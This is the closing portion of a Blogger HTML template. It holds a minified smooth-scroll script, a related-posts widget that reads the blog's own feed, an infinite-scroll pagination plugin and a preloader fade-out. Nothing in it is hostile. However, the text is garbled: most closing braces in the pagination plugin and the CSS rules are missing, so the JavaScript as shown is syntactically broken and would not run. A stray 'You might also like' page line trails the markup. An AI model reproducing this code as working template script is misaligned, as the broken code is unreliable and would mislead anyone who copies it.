E(u,e,n/v.frameRate+1):T=!1};E(u,e,0),T=!0}}function n(e){x||t();var n=e.target,r=l(n);if(!r||
e.defaultPrevented||s(w,"embed")||s(n,"embed")&&/\.pdf/i.test(n.src))return!0;var
a=e.wheelDeltaX||0,i=e.wheelDeltaY||0;return a||i||(i=e.wheelDelta||0),!
v.touchpadSupport&&f(i)?!0:
(Math.abs(a)>1.2&&(a*=v.stepSize/120),Math.abs(i)>1.2&&(i*=v.stepSize/120),o(r,-a,-i),void
e.preventDefault())}function r(e){var t=e.target,n=e.ctrlKey||e.altKey||e.metaKey||
e.shiftKey&&e.keyCode!==H.spacebar;if(/input|textarea|select|embed/i.test(t.nodeName)||
t.isContentEditable||e.defaultPrevented||n)return!
0;if(s(t,"button")&&e.keyCode===H.spacebar)return!0;var
r,a=0,i=0,u=l(w),c=u.clientHeight;switch(u==document.body&&(c=window.innerHeight),e.keyCode)
{case H.up:i=-v.arrowScroll;break;case H.down:i=v.arrowScroll;break;case H.spacebar:r=e.shiftKey?
1:-1,i=-r*c*.9;break;case H.pageup:i=.9*-c;break;case H.pagedown:i=.9*c;break;case H.home:i=-
u.scrollTop;break;case H.end:var d=u.scrollHeight-u.scrollTop-c;i=d>0?d+10:0;break;case H.left:a=-
v.arrowScroll;break;case H.right:a=v.arrowScroll;break;default:return!
0}o(u,a,i),e.preventDefault()}function a(e){w=e.target}function i(e,t){for(var
o=e.length;o--;)z[N(e[o])]=t;return t}function l(e){var t=[],o=S.scrollHeight;do{var
n=z[N(e)];if(n)return i(t,n);if(t.push(e),o===e.scrollHeight){if(!y||S.clientHeight+10<o)return
i(t,document.body)}else
if(e.clientHeight+10<e.scrollHeight&&(overflow=getComputedStyle(e,"").getPropertyValue("overflo
w-y"),"scroll"===overflow||"auto"===overflow))return i(t,e)}while(e=e.parentNode)}function
u(e,t,o){window.addEventListener(e,t,o||!1)}function c(e,t,o){window.removeEventListener(e,t,o||!
1)}function s(e,t){return(e.nodeName||"").toLowerCase()===t.toLowerCase()}function d(e,t){e=e>0?
1:-1,t=t>0?1:-1,(k.x!==e||k.y!==t)&&(k.x=e,k.y=t,M=[],C=0)}function f(e){if(e)
{e=Math.abs(e),D.push(e),D.shift(),clearTimeout(A);var
t=D[0]==D[1]&&D[1]==D[2],o=h(D[0],120)&&h(D[1],120)&&h(D[2],120);return!(t||o)}}function
h(e,t){return Math.floor(e/t)==e/t}function m(e){var t,o,n;return e*=v.pulseScale,1>e?t=e-(1-
Math.exp(-e)):(o=Math.exp(-1),e-=1,n=1-Math.exp(-e),t=o+n*(1-o)),t*v.pulseNormalize}function
p(e){return e>=1?1:0>=e?0:(1==v.pulseNormalize&&(v.pulseNormalize/=m(1)),m(e))}var
w,g={frameRate:150,animationTime:800,stepSize:120,pulseAlgorithm:!
0,pulseScale:8,pulseNormalize:1,accelerationDelta:20,accelerationMax:1,keyboardSupport:!
0,arrowScroll:50,touchpadSupport:!0,fixedBackground:!0,excluded:""},v=g,b=!1,y=!1,k={x:0,y:0},x=!
1,S=document.documentElement,D=[120,120,120],H={left:37,up:38,right:39,down:40,spacebar:32,p
ageup:33,pagedown:34,end:35,home:36},v=g,M=[],T=!1,C=+new Date,z={};setInterval(function()
{z={}},1e4);var A,N=function(){var e=0;return function(t){return t.uniqueID||(t.uniqueID=e++)}}
(),E=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||
function(e,t,o){window.setTimeout(e,o||1e3/60)}}
(),K=/chrome/i.test(window.navigator.userAgent),L="onmousewheel"in
document;L&&K&&(u("mousedown",a),u("mousewheel",n),u("load",t))}();

//]]></script>

<script>

//<![CDATA[

$(document).ready(function(){function relatedPost(g,e,r){$.ajax({url:"/feeds/posts/default/-/"+e+"?
alt=json-in-script&max-results="+r,type:"get",dataType:"jsonp",success:function(t){for(var
u="",h='<div class="related">',x=0;x<t.feed.entry.length;x++){for(var
z=0;z<t.feed.entry[x].link.length;z++){if("alternate"==t.feed.entry[x].link[z].rel)
{u=t.feed.entry[x].link[z].href;break}}

var p=t.feed.entry[x].title.$t;var c=t.feed.entry[x].content.$t;var y=$


('<div>').html(c);if(c.indexOf("http://www.youtube.com/embed/")>-1||
c.indexOf("https://www.youtube.com/embed/")>-1){var
d=t.feed.entry[x].media$thumbnail.url,m=d.replace('/default.jpg','/mqdefault.jpg'),k=m;}else
if(c.indexOf("<img")>-1){var s=y.find('img:first').attr('src'),v=s.replace('s72-c','s600');var k=v;}else{var
k='http://1.bp.blogspot.com/-eAeO-DYJDws/Vkqtj4HFBFI/AAAAAAAAB0o/Q5OLsyONXM0/s1600-
r/nth.png';}

h+='<li><div class="related-thumb"><a class="related-img" href="'+u+'" style="background:url('+k+')


no-repeat center center;background-size: cover"/></div><h3 class="related-title"><a
href="'+u+'">'+p+'</a></h3></li>'}

h+='</div>',g.html(h);}})}
$("#related-posts").each(function(){var g=$(this),e=g.text(),r=3;relatedPost(g,e,r);});});

//]]>

</script>

<b:if cond='data:blog.pageType != &quot;static_page&quot;'>

<b:if cond='data:blog.pageType!= &quot;item&quot;'>

<b:if cond='data:blog.pageType != &quot;error_page&quot;'>

<style>

article {

padding:0 0 10px 0;

clear: both;

.post-header {

padding:0;

@media only screen and (max-width: 768px) {

article {

padding:10px;

</style>

<!--Page Navigation Starts-->

<script type='text/javascript'>// <![CDATA[

(function($) {

'use strict';

Date.now = Date.now || function() {

return +new Date()

};

$.ias = function(g) {

var h = $.extend({}, $.ias.defaults, g);

var i = new $.ias.util();

var j = new $.ias.paging(h.scrollContainer);


var k = (h.history ? new $.ias.history() : false);

var l = this;

function init() {

var d;

j.onChangePage(function(a, b, c) {

if (k) {

k.setPage(a, c)

h.onPageChange.call(this, a, c, b)

});

reset();

if (k && k.havePage()) {

stop_scroll();

d = k.getPage();

i.forceScrollTop(function() {

var a;

if (d > 1) {

paginateToPage(d);

a = get_scroll_threshold(true);

$('html, body').scrollTop(a)

} else {

reset()

})

return l

init();

function reset() {
hide_pagination();

h.scrollContainer.scroll(scroll_handler)

function scroll_handler() {

var a, scrThreshold;

a = i.getCurrentScrollOffset(h.scrollContainer);

scrThreshold = get_scroll_threshold();

if (a >= scrThreshold) {

if (get_current_page() >= h.triggerPageThreshold) {

stop_scroll();

show_trigger(function() {

paginate(a)

})

} else {

paginate(a)

function stop_scroll() {

h.scrollContainer.unbind('scroll', scroll_handler)

function hide_pagination() {

$(h.pagination).hide()

function get_scroll_threshold(a) {

var b, threshold;

b = $(h.container).find(h.item).last();
if (b.size() === 0) {

return 0

threshold = b.offset().top + b.height();

if (!a) {

threshold += h.thresholdMargin

return threshold

function paginate(d, e) {

var f;

f = $(h.next).attr('href');

if (!f) {

if (h.noneleft) {

$(h.container).find(h.item).last().after(h.noneleft)

return stop_scroll()

if (h.beforePageChange && $.isFunction(h.beforePageChange)) {

if (h.beforePageChange(d, f) === false) {

return

j.pushPages(d, f);

stop_scroll();

show_loader();

loadItems(f, function(a, b) {

var c = h.onLoadItems.call(this, b),

curLastItem;

if (c !== false) {
$(b).hide();

curLastItem = $(h.container).find(h.item).last();

curLastItem.after(b);

$(b).fadeIn()

f = $(h.next, a).attr('href');

$(h.pagination).replaceWith($(h.pagination, a));

remove_loader();

hide_pagination();

if (f) {

reset()

} else {

stop_scroll()

h.onRenderComplete.call(this, b);

if (e) {

e.call(this)

})

function loadItems(b, c, d) {

var e = [],

container, startTime = Date.now(),

diffTime, self;

d = d || h.loaderDelay;

$.get(b, null, function(a) {

container = $(h.container, a).eq(0);

if (0 === container.length) {

container = $(a).filter(h.container).eq(0)

}
if (container) {

container.find(h.item).each(function() {

e.push(this)

})

if (c) {

self = this;

diffTime = Date.now() - startTime;

if (diffTime < d) {

setTimeout(function() {

c.call(self, a, e)

}, d - diffTime)

} else {

c.call(self, a, e)

}, 'html')

function paginateToPage(a) {

var b = get_scroll_threshold(true);

if (b > 0) {

paginate(b, function() {

stop_scroll();

if ((j.getCurPageNum(b) + 1) < a) {

paginateToPage(a);

$('html,body').animate({

'scrollTop': b

}, 400, 'swing')

} else {

$('html,body').animate({
'scrollTop': b

}, 1000, 'swing');

reset()

})

function get_current_page() {

var a = i.getCurrentScrollOffset(h.scrollContainer);

return j.getCurPageNum(a)

function get_loader() {

var a = $('.ias_loader');

if (a.size() === 0) {

a = $('<div class="ias_loader" style="text-align:center;">' + h.loader + '</div>');

a.hide()

return a

function show_loader() {

var a = get_loader(),

el;

if (h.customLoaderProc !== false) {

h.customLoaderProc(a)

} else {

el = $(h.container).find(h.item).last();

el.after(a);

a.fadeIn()
}

function remove_loader() {

var a = get_loader();

a.remove()

function get_trigger(a) {

var b = $('.ias_trigger');

if (b.size() === 0) {

b = $('<div class="ias_trigger"><a href="#">' + h.trigger + '</a></div>');

b.hide()

$('a', b).off('click').on('click', function() {

remove_trigger();

a.call();

return false

});

return b

function show_trigger(a) {

var b = get_trigger(a),

el;

el = $(h.container).find(h.item).last();

el.after(b);

b.fadeIn()

function remove_trigger() {
var a = get_trigger();

a.remove()

};

$.ias.defaults = {

container: '.blog-posts',

scrollContainer: $(window),

item: '.post-grid',

pagination: '#blog-pager',

next: '#blog-pager-older-link a',

loader: '<img src="http://2.bp.blogspot.com/-


OppefDeiUDA/UVwLAL_B_mI/AAAAAAAAPO4/y8T9CPORHq4/s1600/loadersz.gif" class="loader-
page"/>',

loaderDelay: 600,

triggerPageThreshold: 1,

trigger: 'See More',

thresholdMargin: -500,

history: true,

onPageChange: function() {},

beforePageChange: function() {},

onLoadItems: function() {},

onRenderComplete: function() {},

customLoaderProc: false

};

$.ias.util = function() {

var c = false;

var d = false;

var e = this;

function init() {

$(window).load(function() {

c = true
})

init();

this.forceScrollTop = function(a) {

$('html,body').scrollTop(0);

if (!d) {

if (!c) {

setTimeout(function() {

e.forceScrollTop(a)

}, 1)

} else {

a.call();

d = true

};

this.getCurrentScrollOffset = function(a) {

var b, wndHeight;

if (a.get(0) === window) {

b = a.scrollTop()

} else {

b = a.offset().top

wndHeight = a.height();

return b + wndHeight

};

$.ias.paging = function() {

var c = [

[0, document.location.toString()]

];
var d = function() {};

var e = 1;

var f = new $.ias.util();

function init() {

$(window).scroll(scroll_handler)

init();

function scroll_handler() {

var a, curPageNum, curPagebreak, scrOffset, urlPage;

a = f.getCurrentScrollOffset($(window));

curPageNum = getCurPageNum(a);

curPagebreak = getCurPagebreak(a);

if (e !== curPageNum) {

scrOffset = curPagebreak[0];

urlPage = curPagebreak[1];

d.call({}, curPageNum, scrOffset, urlPage)

e = curPageNum

function getCurPageNum(a) {

for (var i = (c.length - 1); i > 0; i--) {

if (a > c[i][0]) {

return i + 1

return 1

this.getCurPageNum = function(a) {
a = a || f.getCurrentScrollOffset($(window));

return getCurPageNum(a)

};

function getCurPagebreak(a) {

for (var i = (c.length - 1); i >= 0; i--) {

if (a > c[i][0]) {

return c[i]

return null

this.onChangePage = function(a) {

d=a

};

this.pushPages = function(a, b) {

c.push([a, b])

};

$.ias.history = function() {

var e = false;

var f = false;

function init() {

f = !!(window.history && history.pushState && history.replaceState);

f = false

init();

this.setPage = function(a, b) {

this.updateState({

page: a
}, '', b)

};

this.havePage = function() {

return (this.getState() !== false)

};

this.getPage = function() {

var a;

if (this.havePage()) {

a = this.getState();

return a.page

return 1

};

this.getState = function() {

var a, stateObj, pageNum;

if (f) {

stateObj = history.state;

if (stateObj && stateObj.ias) {

return stateObj.ias

} else {

a = (window.location.hash.substring(0, 7) === '#/page/');

if (a) {

pageNum = parseInt(window.location.hash.replace('#/page/', ''), 10);

return {

page: pageNum

return false

};
this.updateState = function(a, b, c) {

if (e) {

this.replaceState(a, b, c)

} else {

this.pushState(a, b, c)

};

this.pushState = function(a, b, c) {

var d;

if (f) {

history.pushState({

ias: a

}, b, c)

} else {

d = (a.page > 0 ? '#/page/' + a.page : '');

window.location.hash = d

e = true

};

this.replaceState = function(a, b, c) {

if (f) {

history.replaceState({

ias: a

}, b, c)

} else {

this.pushState(a, b, c)

})(jQuery);
//]]></script>

<script>jQuery.ias();</script>

</b:if>

</b:if>

</b:if>

<!--Page Navigation Ends -->

<script type='text/javascript'>

/*<![CDATA[*/

$(window).bind("load", function () {

jQuery(".loader").fadeOut("slow");

jQuery(".preloader").delay(0).fadeOut();

});

/*]]>*/

</script>

</body>

</html>

You might also like